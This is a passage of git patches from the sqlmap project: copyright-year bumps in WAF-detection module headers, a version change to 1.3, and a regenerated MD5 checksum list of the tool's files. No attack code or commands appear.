@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/tencent.py b/waf/tencent.py
index fd8a7ba079f..d5dfed212f9 100644
--- a/waf/tencent.py
+++ b/waf/tencent.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/teros.py b/waf/teros.py
index 2516454709e..1d4c8019da7 100644
--- a/waf/teros.py
+++ b/waf/teros.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/trafficshield.py b/waf/trafficshield.py
index 9a67c36d9e4..a2b830eed38 100644
--- a/waf/trafficshield.py
+++ b/waf/trafficshield.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/urlscan.py b/waf/urlscan.py
index 3f044c76bd6..e3206c33a61 100644
--- a/waf/urlscan.py
+++ b/waf/urlscan.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/uspses.py b/waf/uspses.py
index bc26c1efdbe..7f857240e27 100644
--- a/waf/uspses.py
+++ b/waf/uspses.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/varnish.py b/waf/varnish.py
index 8617cd802d7..946e1271396 100644
--- a/waf/varnish.py
+++ b/waf/varnish.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/wallarm.py b/waf/wallarm.py
index 9ad1f46c6a8..3c98c436ace 100644
--- a/waf/wallarm.py
+++ b/waf/wallarm.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/watchguard.py b/waf/watchguard.py
index f6c63e4ac1b..bb40d49d97b 100644
--- a/waf/watchguard.py
+++ b/waf/watchguard.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/webappsecure.py b/waf/webappsecure.py
index 5eb0e2e4f01..e966302c0db 100644
--- a/waf/webappsecure.py
+++ b/waf/webappsecure.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/webknight.py b/waf/webknight.py
index 54abfa8aca4..7fbdc6f7b27 100644
--- a/waf/webknight.py
+++ b/waf/webknight.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/wordfence.py b/waf/wordfence.py
index dadb8151fa4..40a6711687f 100644
--- a/waf/wordfence.py
+++ b/waf/wordfence.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/yundun.py b/waf/yundun.py
index ede324f0a05..e9b57cac4ca 100644
--- a/waf/yundun.py
+++ b/waf/yundun.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/yunsuo.py b/waf/yunsuo.py
index fd0b9b36944..d51da493558 100644
--- a/waf/yunsuo.py
+++ b/waf/yunsuo.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/waf/zenedge.py b/waf/zenedge.py
index b5b3e0fb39c..d15ca0fc341 100644
--- a/waf/zenedge.py
+++ b/waf/zenedge.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
From 4c4de54ad8f0f0fe9ef13207927a5780b8e7353c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Sat, 5 Jan 2019 21:48:39 +0100
Subject: [PATCH 426/428] Prepare for 1.3
---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 5f6f1e9e702..a25b3b6a72c 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.12.49"
+VERSION = "1.3"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
From 5957aad73843d6f3f00514d71628af890d3597a7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Sat, 5 Jan 2019 22:58:28 +0100
Subject: [PATCH 427/428] Update of checksums
---
 txt/checksum.md5 | 698 +++++++++++++++++++++++------------------------
 1 file changed, 349 insertions(+), 349 deletions(-)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 6e7ab0bcb8e..c27c127756e 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -1,230 +1,230 @@ -4cb52d99ae953f04fb0f17825b0dabc4 extra/beep/beep.py -1e5532ede194ac9c083891c2f02bca93 extra/beep/__init__.py -b0eb597c613afeff9d62898cf4c67a56 extra/cloak/cloak.py -1e5532ede194ac9c083891c2f02bca93 extra/cloak/__init__.py -e0911386106b95d2ba4b12d651b2eb16 extra/dbgtool/dbgtool.py -1e5532ede194ac9c083891c2f02bca93 extra/dbgtool/__init__.py +3d37032b2bd62ee37bd61c5b7ad31ab4 extra/beep/beep.py +fb6be55d21a70765e35549af2484f762 extra/beep/__init__.py +ed51a485d1badc99267f0d136bfb2a12 extra/cloak/cloak.py +fb6be55d21a70765e35549af2484f762 extra/cloak/__init__.py +6baecbea87de0a56f99e59bfe982ebc5 extra/dbgtool/dbgtool.py +fb6be55d21a70765e35549af2484f762 extra/dbgtool/__init__.py acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ 708e9fd35dabcbfcd10e91bbc14f091f extra/icmpsh/icmpsh_m.py 2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py -1e5532ede194ac9c083891c2f02bca93 extra/__init__.py +fb6be55d21a70765e35549af2484f762 extra/__init__.py ff90cb0366f7cefbdd6e573e27e6238c extra/runcmd/runcmd.exe_ -1e5532ede194ac9c083891c2f02bca93 extra/safe2bin/__init__.py -b6c0f2047e9bea90f4d5c5806c0f6a9a extra/safe2bin/safe2bin.py +fb6be55d21a70765e35549af2484f762 extra/safe2bin/__init__.py +f372fef397ba41ea54334c16ebe646b2 extra/safe2bin/safe2bin.py d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ 2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ -220745c50d375dad7aefebf8ca3611ef extra/shutils/duplicates.py +d1bf28af13f1017f4007f29ea86afd25 extra/shutils/duplicates.py e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 71b9d4357c31db013ecda27433830090 extra/shutils/pylint.py -1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py -1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py -b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py -1e5532ede194ac9c083891c2f02bca93 
extra/wafdetectify/__init__.py -d2fe1ac374de3c2d7729152cb8c80ce8 extra/wafdetectify/wafdetectify.py -3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -d4582467b0735525d8d8bdc0396ec87f lib/controller/checks.py -197bdf07f8ea15ecc7e0dafea4f9ae2f lib/controller/controller.py -988b548f6578adf9cec17afdeee8291c lib/controller/handler.py -1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -e62309b22a59e60b270e62586f169441 lib/core/agent.py -c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -7272b591e710224c578071381e28c6c5 lib/core/common.py -0d082da16c388b3445e656e0760fb582 lib/core/convert.py -9f87391b6a3395f7f50830b391264f27 lib/core/data.py -72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py -2e62f7c5e89442e5a76e6d797d54be2c lib/core/decorators.py -fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -ac7c070b2726d39fbac1916b1a5f92b2 lib/core/dicts.py -760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py -5b6999c4b78180961e9f33e172d4dd66 lib/core/enums.py -cada93357a7321655927fc9625b3bfec lib/core/exception.py -1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py -458a194764805cd8312c14ecd4be4d1e lib/core/log.py -7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -b75d17fef2c6675b53a8874484ea771f lib/core/option.py -c8c386d644d57c659d74542f5f57f632 lib/core/patch.py -6783160150b4711d02c56ee2beadffdb lib/core/profiling.py -6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py -0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py -a7db43859b61569b601b97f187dd31c5 lib/core/revision.py -fcb74fcc9577523524659ec49e2e964b lib/core/session.py -029c708c75256a97c39c14e24e62ba08 lib/core/settings.py -a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py -a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -1581be48127a3a7a9fd703359b6e7567 lib/core/target.py -72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py -cd0067d1798e45f422ce44b98baf57db lib/core/threads.py -c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py 
-b35636650cfe721f5cc47fb91737c061 lib/core/update.py -e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py -1e5532ede194ac9c083891c2f02bca93 lib/__init__.py -7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -0f92bdaacd8210520bdd6e0c531c70cd lib/parse/cmdline.py -fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py -3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py -6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py -1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py -1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py -492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py -30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -67c035eda3066b44c592b2f602e44b3e lib/request/basic.py -859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -2fe9e5118553f9b2b37ca33d5f85a401 lib/request/connect.py -dd4598675027fae99f2e2475b05986da lib/request/direct.py -2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py -98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py -1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py -a5cbc19ee18bd4b848515eb3ea3291f0 lib/request/inject.py -aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py -83c7a13e38ad5eedb6bb13463a7a9e90 lib/request/pkihandler.py -2c3774b72586985719035b195f144d7b lib/request/rangehandler.py -3cd9d17fc52bb62db29e0e24fc4d8a97 lib/request/redirecthandler.py -7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py -747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py -acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py -1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py -4bf186a747e1a0c4ed5127ef064c3920 lib/takeover/metasploit.py -fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py -6a49f359b922df0247eb236126596336 lib/takeover/udf.py -ce8524022df29602f3d6c3c41f938ad4 lib/takeover/web.py -debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py -db208ab47de010836c6bf044e2357861 
lib/techniques/blind/inference.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py -799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py -48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -686904374067047b521151301321b30a lib/techniques/error/use.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -7047a66c35ce0c820931fc5bf73008a3 lib/techniques/union/test.py -1f2ff182a28b2baf9f9fe7477c76618d lib/techniques/union/use.py -fd1ede20ec674518a54966eaf0c9f8c6 lib/utils/api.py -37dfb641358669f62c2acedff241348b lib/utils/brute.py -31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py -f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py -f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py -7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py -1205648d55649accafae2cc77d647aa0 lib/utils/hashdb.py -eb2aa3fa9ebdf4cb6ac3e005f7df1e9b lib/utils/hash.py -011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py -1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py -527409077a094b63c88f3291138b1c81 lib/utils/pivotdumptable.py -683c3bd05b6164f56a57ed495c162684 lib/utils/progress.py -0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py -2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py -cede46255b3c8f8d0b425b1c72cac75a lib/utils/sqlalchemy.py -dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -4703ceeb32131a9a7a6561575644123b lib/utils/versioncheck.py -e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py -d8a541a63f3b561334de51abb4dcad55 plugins/dbms/access/connector.py -3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py -fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py -cdd082981b421248ece0e7cf278071ff plugins/dbms/access/fingerprint.py -e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 
-77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py -2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py -24a79eb2dde8ea9340a701c8c2591701 plugins/dbms/db2/connector.py -4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py -da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py -ce434fc05a7ad236c49a155d62f0cac4 plugins/dbms/db2/fingerprint.py -95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py -82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py -25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py -1ac54bbfb81ffed945636432bc49466b plugins/dbms/firebird/connector.py -bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py -c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py -bf98dbd666c162088f23ee697c065010 plugins/dbms/firebird/fingerprint.py -d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py -c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py -1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py -79c44d8d0dffc140d38796a32e92a66a plugins/dbms/h2/connector.py -5b99e9a60409f54a140747ce1ca0342f plugins/dbms/h2/enumeration.py -36522c36650afc43c1166ab68b297ecb plugins/dbms/h2/filesystem.py -83255ebf7b1d23a408f0c68a7fa63422 plugins/dbms/h2/fingerprint.py -1de698e4cfddd754ffe31ea2640a481a plugins/dbms/h2/__init__.py -4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/h2/syntax.py -af746ef421cfefedc1aaa9dca1503de2 plugins/dbms/h2/takeover.py -271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py -95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py -7747ad6cc12e295ba3fb4518ac083d1e plugins/dbms/hsqldb/filesystem.py -b061bdbb9159c449072fde51b444f1c0 plugins/dbms/hsqldb/fingerprint.py -fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py -4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py -7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py 
-d61a5f79a9fa07c06fe7f5a653662e95 plugins/dbms/informix/connector.py -c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py -da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py -b182f01c2ba82aa94fbe4948383ea98d plugins/dbms/informix/fingerprint.py -9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py -aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py -25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py -1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py -9c0307881fae556521bec393956664b0 plugins/dbms/maxdb/connector.py -1f3f9d4c7ec62452ed2465cd9cf50aa1 plugins/dbms/maxdb/enumeration.py -ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py -9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py -4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py -e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py -bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py -5e1c7e578d07f3670bba5d88d856715d plugins/dbms/mssqlserver/connector.py -f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py -65911fdc86fa6322e72319e6488a0bb8 plugins/dbms/mssqlserver/filesystem.py -6cf74341fc84588205e02b70b2f0f5b6 plugins/dbms/mssqlserver/fingerprint.py -f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py -612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py -3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py -14bfa3960ed0b4bec2cd29800ec525b7 plugins/dbms/mysql/connector.py -445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -edec54520556a5eb66900fca697940ff plugins/dbms/mysql/filesystem.py -1c0175476b833a1b788550726be67c99 plugins/dbms/mysql/fingerprint.py -30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py -0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py -403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py 
-f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py -e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py -c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py -85a5d474faaf14df5a5a84c9f232c1d6 plugins/dbms/oracle/fingerprint.py -9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py -5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py -bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py -f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py -7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py -c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py -1449c89fa6dac9b62e814cc65233b9de plugins/dbms/postgresql/fingerprint.py -470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py -20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py -1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py -80a2083a4fb7809d310c3d5ecc94e3c5 plugins/dbms/sqlite/connector.py -5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py -90fa97b84998a01dba7cc8c3329a1223 plugins/dbms/sqlite/filesystem.py -9b1f236857b8a64750e8662be21abb69 plugins/dbms/sqlite/fingerprint.py -f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py -964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py -3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py -9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py -4fe9ee0dfa50e9c46e6512128471cbee plugins/dbms/sybase/enumeration.py -74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py -0329ab09187614bea02398def59695ec plugins/dbms/sybase/fingerprint.py -a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py -36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py -79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py -bdc159cc5afb28cadd980c01c43ba669 plugins/generic/connector.py 
-ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -3d75e831574c750ed58e24eaa562c056 plugins/generic/databases.py -35546acab0eea406c23b84363df4d534 plugins/generic/entries.py -d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py -0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py -f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py -1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py -f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py -30b421f06dc98998ddc1923a9048b7fc plugins/generic/search.py -a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py -f990d799e578dfbc3cde5728655a7854 plugins/generic/takeover.py -8ab0b84fda105459913715b98e1b8a4a plugins/generic/users.py -1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py +11492e9b5f183c289b98442437675c1f extra/shutils/regressiontest.py +fb6be55d21a70765e35549af2484f762 extra/sqlharvest/__init__.py +53d5dcba047f1285e32b9e88d2803ebf extra/sqlharvest/sqlharvest.py +fb6be55d21a70765e35549af2484f762 extra/wafdetectify/__init__.py +be1d8f7b74ad64226c61b1a74251f8ff extra/wafdetectify/wafdetectify.py +d0f2b424f5b2b06f26cdd7076d61be6e lib/controller/action.py +32959690fd69f4131cbb8abc051114e9 lib/controller/checks.py +3c18f0b1d1b9fda682201a264f170b31 lib/controller/controller.py +e97a9d34fef5761a8eab6432ce3c7c53 lib/controller/handler.py +fb6be55d21a70765e35549af2484f762 lib/controller/__init__.py +6da66134fec9d81492e5b7c7241fdbd9 lib/core/agent.py +fdabbf8dda7277e5f4e3d0a6252cffb6 lib/core/bigarray.py +61e6d5e091588bf8e33fb1d92f23868a lib/core/common.py +de8d27ae6241163ff9e97aa9e7c51a18 lib/core/convert.py +abcb1121eb56d3401839d14e8ed06b6e lib/core/data.py +db60c6ebb63b72ed119e304b359fc1a6 lib/core/datatype.py +b7c912e2af7a3354f6d7c04f556a80b2 lib/core/decorators.py +5f4680b769ae07f22157bd832c97cf8f lib/core/defaults.py +9dfc69ba47209a4ceca494dde9ee8183 lib/core/dicts.py +040895bafa05783ca1a2e6c74d6de2c6 lib/core/dump.py +5c91145204092b995ed1ac641e9e291d 
lib/core/enums.py +84ef8f32e4582fcc294dc14e1997131d lib/core/exception.py +fb6be55d21a70765e35549af2484f762 lib/core/__init__.py +18c896b157b03af716542e5fe9233ef9 lib/core/log.py +fa9f24e88c81a6cef52da3dd5e637010 lib/core/optiondict.py +83d9f55dad3915ff66ce7f2f21452bc2 lib/core/option.py +fe370021c6bc99daf44b2bfc0d1effb3 lib/core/patch.py +0f1d79ada721cf6def611b21b03d68af lib/core/profiling.py +5e2c16a8e2daee22dd545df13386e7a3 lib/core/readlineng.py +9a7d68d5fa01561500423791f15cc676 lib/core/replication.py +3179d34f371e0295dd4604568fb30bcd lib/core/revision.py +d6269c55789f78cf707e09a0f5b45443 lib/core/session.py +43ee2f1b9e898fa8e9788b921f278609 lib/core/settings.py +a8a7501d1e6b21669b858a62e921d191 lib/core/shell.py +5dc606fdf0afefd4b305169c21ab2612 lib/core/subprocessng.py +eec3080ba5baca44c6de4595f1c92a0d lib/core/target.py +a057a8ae12fd21f6c409feee1266e7ad lib/core/testing.py +5ebd996b2a77449df90320847e30a073 lib/core/threads.py +2c263c8610667fdc593c50a35ab20f57 lib/core/unescaper.py +5bd7cd6553a4a1c85cbaaddc268108e4 lib/core/update.py +5232b05d5c42a0e5a5a2d5952c6c39a5 lib/core/wordlist.py +fb6be55d21a70765e35549af2484f762 lib/__init__.py +4881480d0c1778053908904e04570dc3 lib/parse/banner.py +65a5b384bc3d545b366b344eddeb0805 lib/parse/cmdline.py +85e44fc7673a661305909a85ed24c5ae lib/parse/configfile.py +9b33e52f697d6e915c7a10153562ce89 lib/parse/handler.py +43deb2400e269e602e916efaec7c0903 lib/parse/headers.py +77e802323ffa718dd9c27512656c0a70 lib/parse/html.py +fb6be55d21a70765e35549af2484f762 lib/parse/__init__.py +92b55cf4246ae7ff6651ac8deb4a0ac5 lib/parse/payloads.py +993104046c7d97120613409ef7780c76 lib/parse/sitemap.py +e4ea70bcd461f5176867dcd89d372386 lib/request/basicauthhandler.py +6076c01e84b589adb97cac421a7d5251 lib/request/basic.py +fc25d951217077fe655ed2a3a81552ae lib/request/comparison.py +3b76bfadb74c069b17d73d2aba241005 lib/request/connect.py +7cba86090b02558f04c6692cef66e772 lib/request/direct.py +0a5cc34a7bbe709684ce32b4b46afd32 
lib/request/dns.py +7bab2719ef2a6f1ddd838fa2335ae635 lib/request/httpshandler.py +fb6be55d21a70765e35549af2484f762 lib/request/__init__.py +00720f9eddf42f4fefa083fba40f69ed lib/request/inject.py +52a067bd2fe91ea9395269a684380cbb lib/request/methodrequest.py +321786eeb43821106e41fc72bd4f9901 lib/request/pkihandler.py +16ff6e078819fe517b1fc0ae3cbc1aa8 lib/request/rangehandler.py +e79048c2a08c1a47efd5652f59c4417d lib/request/redirecthandler.py +1e60edebdb3997055616d12f4a932375 lib/request/templates.py +d0059dbb1e928871747a8893b41ce268 lib/takeover/abstraction.py +ac9efea51eba120b667b4b73536d7f1c lib/takeover/icmpsh.py +fb6be55d21a70765e35549af2484f762 lib/takeover/__init__.py +093301eaeac3cd19374f2e389e873b18 lib/takeover/metasploit.py +6b5b841d445b7b973c2e033edfb01b16 lib/takeover/registry.py +ad038ac567f97a4b940b7987792d64a4 lib/takeover/udf.py +915a3fbd557fb136bd0e16c46d993be3 lib/takeover/web.py +1aadcdc058bb813d09ad23d26ea2a6b5 lib/takeover/xp_cmdshell.py +034490840639b5ca2bc97af4cb14f449 lib/techniques/blind/inference.py +fb6be55d21a70765e35549af2484f762 lib/techniques/blind/__init__.py +fb6be55d21a70765e35549af2484f762 lib/techniques/dns/__init__.py +ea48db4c48276d7d0e71aa467c0c523f lib/techniques/dns/test.py +437786cd2f9c3237614e3cac0220b2a6 lib/techniques/dns/use.py +fb6be55d21a70765e35549af2484f762 lib/techniques/error/__init__.py +c23a6f8e88242c84b54426ae7cd430a1 lib/techniques/error/use.py 